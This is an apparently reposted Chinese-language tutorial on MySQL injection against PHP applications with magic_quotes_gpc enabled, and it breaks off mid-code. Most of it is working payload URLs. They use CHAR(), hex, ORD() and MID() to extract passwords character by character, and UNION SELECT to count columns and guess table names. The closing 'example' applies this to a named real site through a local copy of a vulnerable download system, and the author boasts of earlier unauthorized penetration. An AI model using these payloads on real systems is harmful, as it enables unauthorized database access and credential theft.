magicquotesgpc为on非单引号注入 -电脑资料

    注：现在我们假设magic_quotes_gpc为on了，

magicquotesgpc为on非单引号注入

    众所周知，整形的数据是不需要用引号引起来的，而字符串就要用引号，这样可以避免很多

    问题。但是如果仅仅用整形数据，我们是没有办法注入的，所以我需要把我们构造的语句转换成

    整形类型，这个就需要用到CHAR()，ASCII(),ORD(),CONV()这些函数了，举个简单的例子：

    Select * FROM user Where username=’angel’

    如何使$username不带引号呢？很简单我们这样提交就可以了。

    Select * FROM user Where username=char(97,110,103,101,108)

    # char(97,110,103,101,108) 相当于angel，十进制。

    Select * FROM user Where username=0x616E67656C

    # 0x616E67656C 相当于angel，十六进制。

    其他函数大家自己去测试好了，但是前提就如上面所说的，我们可以构造的变量不被引号所

    包含才有意义，不然我们不管构造什么，只是字符串，发挥不了作用，比如前面猜密码的例子

    (user,php)，我们把查询条件改为userid：

    Select * FROM user Where userid=userid

    按照正常的，提交：

    http://127.0.0.1/injection/user.php?userid=1

    就可以查询userid为1的用户资料，因为1是数字，所以有没有引号都无所谓，但是如果我们

    构造：

    http://127.0.0.1/injection/user.php?userid=1 and password=mypass

    绝对错误，因为mypass是字符串，除非提交：

    http://127.0.0.1/injection/user.php?userid=1 and password=’mypass’

    由于magic_quotes_gpc打开的关系，这个是绝对不可能的。引号会变成/’，我们有什么办法

    可以把这些字符串变成整形数据吗？就是用CHAR()函数，如果我们提交：

    http://127.0.0.1/injection/user.php?userid=1 and password=char

    (109,121,112,97,115,115)

    正常返回，实践证明，我们用CHAR()是可行的，我们就把CHAR()用进LEFT函数里面逐位猜解

    ！

    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)=char(109)

    正常返回，说明userid为1的用户，password字段第一位是char(109)，我们继续猜：

    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,2)=char(109,121)

    又正常返回，说明正确，但这样影响到效率，既然是整形，我们完全可以用比较运算符来比

    较：

    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)

    然后适当调整char()里面的数字来确定一个范围，很快就可以猜出来，到了后面的时候，还

    是可以用比较运算符来比较：

    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,3)>char(109,121,111)

    而原来已经猜好的不用改变了，很快就可以猜完：

    http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,6)=char

    (109,121,112,97,115,115)

    然后在mysql>命令提示符下或者在phpMyadmin里面执行：

    select char(109,121,112,97,115,115)

    就会返回：mypass

    当然也可以使用SUBSTRING(str,pos,len)和MID(str,pos,len)函数，从字符串 str 的 pos

    位置起返回 len 个字符的子串。这个和ACCESS是一样的。还是刚才的例子，我们猜password字段

    的第三位、第四位试试，第三位是p，第四位是a，我们这样构造：

    http://127.0.0.1/injection/user.php?userid=1 and mid(password,3,1)=char(112)

    http://127.0.0.1/injection/user.php?userid=1 and mid(password,4,1)=char(97)

    我们要的结果就迸出来了。当然，如果觉得麻烦，还可以用更简单的办法，就是利用ord()函

    数，具体作用可以去查看MYSQL参考手册，该函数返回的是整形类型的数据，可以用比较运算符进

    行比较、当然得出的结果也就快多了，也就是这样提交：

    http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111

    http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))<113

    http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))=112

    这样我们就得出结果了，然后我们再用char()函数还原出来就好了。至于其他更多函数，大

    家可以自己去试验，限于篇幅也不多说了。

    3、快速确定未知数据结构的字段及类型

    如果不清楚数据结构，很难用UNION联合查询，这里我告诉大家一个小技巧，也是非常有用非

    常必要的技巧，充分发挥UNION的特性。

    还是拿前面的show.php文件做例子，当我们看到形如xxx.php?id=xxx的URL的时候，如果要

    UNION，就要知道这个xxx.php查询的数据表的结构，我们可以这样提交来快速确定有多少个字段

    ：

    http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1

    有多少个“1”就表示有多少个字段，可以慢慢试，如果字段数不相同，就肯定会出错，如果

    字段数猜对了，就肯定会返回正确的页面，字段数出来了，就开始判断数据类型，其实也很容易

    ，随便用几个字母代替上面的1，但是由于magic_quotes_gpc打开，我们不能用引号，老办法，还

    是用char()函数，char(97)表示字母“a”，如下：

    http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

    如果是字符串，那就会正常显示“a”，如果不是字符串或文本，也就是说是整形或布尔形，

    就会返回“0”

    判断最主要靠什么？经验，我以前一直都说，经验很重要，丰富经验能更好的作出正确的判

    断，因为程序的代码是千变万化的，我们这里是只是举个最简单的例子，这里由于局限性，程序

    都是我自己写、自己测试的。方法因程序而异。希望大家在实战中，注意区别，不要照搬，灵活

    运用才是根本。

    4、猜数据表名

    在快速确定未知数据结构的字段及类型的基础上，我们又可以进一步的分析整个数据结构，

    那就是猜表名，其实使用UNION联合查询的时候，不管后面的查询怎么“畸形”，只要没有语句上

    的问题，都会正确返回，也就是说，我们可以在上面的基础上，进一步猜到表名了，比如刚才我

    们提交：

    http://127.0.0.1/injection/show.php?id=1 union select 1,1,1

    返回正常的内容，就说明这个文件查询的表内是存在3个字段的，然后我们在后面加入from

    table_name，也就是这样：

    http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from members

    http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from admin

    http://127.0.0.1/injection/show.php?id=1 union select 1,1,1 from user

    如果这个表是存在的，那么同样会返回应该显示的内容，如果表不存在，当然就会出错了，

    所以我的思路是先获得有漏洞的文件所查询表的数据结构，确定结果后再进一步查询表，这个手

    工操作是没有效率的问题的，不到一分钟就可以查询到了，比如我们在测试www.***bai.net就是

    这样，后面的实例会涉及到。

    但是有一个问题，由于很多情况下，很多程序的数据表都会有一个前缀，有这个前缀就可以

    让多个程序共用一个数据库。比如：

    site_article

    site_user

    site_download

    forum_user

    forum_post

    ……

    如果安全意识高的话，管理员会加个表名前缀，那猜解就很麻烦了，不过完全可以做一个表

    名列表来跑。这里就不多说了，后面会有一个具体的例子来解开一切迷茫^_^……

    实例

    下面对一个国内非常出名的站点进行善意的攻击测试，来对上面的知识进行一次大概的验证

    ，出于影响等诸多因素，我们称这个站点为HB(www.***bai.net)，HB使用的是夜猫的文章系统和

    下载系统，不过文章系统已经升级了，我们就不看了，下载系统是绝对有问题的，不过由于我现

    在写文章的电脑不上网，我用相同的下载系统在本地进行一次模拟的测试。实际上，我事前早用

    更狠毒的技术渗透过HB。

    首先我们找到有问题的文件，show.php?id=1，我们马上看看数据结构和表名，看看HB有没有

    改字段和表名，我早知道夜猫下载系统1.0.1版的软件信息的表有19个字段，就提交：

    http://127.0.0.1/ymdown/show.php?id=1 union select

    1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

    注意，这里有19个“1”，返回正常的页面，我可以可以肯定字段没有变，我们也就别拖拉了

    ，直接看看夜猫的默认用户数据表是否存在：

    http://127.0.0.1/ymdown/show.php?id=1 union select

    1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user

    嗯，这个HB还真是够懒的，这么烂的程序也不知道先修改一下再用，不过也是，没有多

    少人和我一样有闲心先去加固程序才用的，再看默认的用户id还在不在？

    http://127.0.0.1/ymdown/show.php?id=1 union select

    1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1

    忘记了，就算不存在id为1的用户，前面的查询是真的，照样会正常返回数据库的软件信息，

    我们只能让前面的查询为假，才能使后面查询的结果显示出来，但我们要注意一点，show.php文

    件里面有这样一段代码：

    if ($id > "0" && $id < "999999999" ):

    //这里是正确执行的代码

    else:

    echo "